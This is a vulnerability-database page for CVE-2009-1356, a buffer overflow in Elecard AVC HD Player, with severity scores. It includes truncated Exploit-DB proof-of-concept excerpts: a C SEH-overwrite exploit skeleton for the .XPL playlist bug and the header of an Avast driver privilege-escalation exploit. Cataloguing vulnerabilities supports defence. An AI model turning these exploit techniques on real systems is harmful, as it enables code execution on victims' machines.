CVE-2009-1356
published 2009-04-21CVE-2009-1356: Stack-based buffer overflow in Elecard AVC HD Player allows remote attackers to execute arbitrary code via a long MP3 filename in a playlist (.xpl) file.
PriorityP341critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
4.83%
90.9th percentile
Stack-based buffer overflow in Elecard AVC HD Player allows remote attackers to execute arbitrary code via a long MP3 filename in a playlist (.xpl) file.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Avast! AntiVirus 4.8.1356 - 'aswRdr.sys' Driver Privilege Escalation
exploitdb·2009-11-16
CVE-2009-4049 Avast! AntiVirus 4.8.1356 - 'aswRdr.sys' Driver Privilege Escalation
Avast! AntiVirus 4.8.1356 - 'aswRdr.sys' Driver Privilege Escalation
---
// source: https://www.securityfocus.com/bid/37031/info
Avast! Antivirus is prone to a local privilege-escalation vulnerability.
Local attackers can exploit this issue to execute arbitrary code with superuser privileges and completely compromise the affected computer. Failed exploit attempts will result in a denial-of-service condition.
Avast! Antivirus 4.8.1356 is vulnerable; other versions may also be affected.
/* Avast 4.8.1356.0 antivirus aswRdr.sys Kernel Pool Corruption
*
* Author(s): Giuseppe 'Evilcry' Bonfa'
* AbdulAziz Hariri
* E-Mail: evilcry _AT_ gmail _DOT_ com
* Website: http://evilcry.netsons.org
* http://evilcodecave.blogspot.com
* http://evilcodecave.wordpress.com
* http://evilfingers.com
*
* Dis
Exploit-DB
Elecard AVC HD Player - '.XPL' Stack Buffer Overflow (SEH) (PoC)
exploitdb·2009-04-16
CVE-2009-1356 Elecard AVC HD Player - '.XPL' Stack Buffer Overflow (SEH) (PoC)
Elecard AVC HD Player - '.XPL' Stack Buffer Overflow (SEH) (PoC)
---
/*ELECARD AVC HD PLAYER STACK BUFFER OVERFLOW ( SEH OVERWRITE )
Name: elecard.c
CREDITS: the one and only fl0 fl0w
004533AE . F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS>
SEH chain of main thread
Address SE handler
0012CB54 FFFFFFFF
Open in debugger and you'll see SEH -->FFFFFFFF and NEXT_SEH EB049090
*/
//START
#include
#include
#include
#include
#include
#include
#define ALLOCSIZE 14911
#define ALLOCMEM (x) { x = (char *)malloc (ALLOCSIZE * sizeof (char)) }
#define SEH 62
#define NEXT_SEH 58
#define NOP 0x90
#define NULLBYTE 0x00
uint8_t Header [] = { 0x23, 0x45, 0x58, 0x54, 0x4D, 0x33, 0x55, 0x0D, 0x0A, 0x23, 0x45, 0x58, 0x54, 0x49, 0x4E, 0x46,
0x3A, 0x33, 0x3A, 0x33, 0x36, 0x2C, 0x45, 0x76, 0x65, 0x72, 0x79
No writeups or analysis indexed.
2009-04-21
Published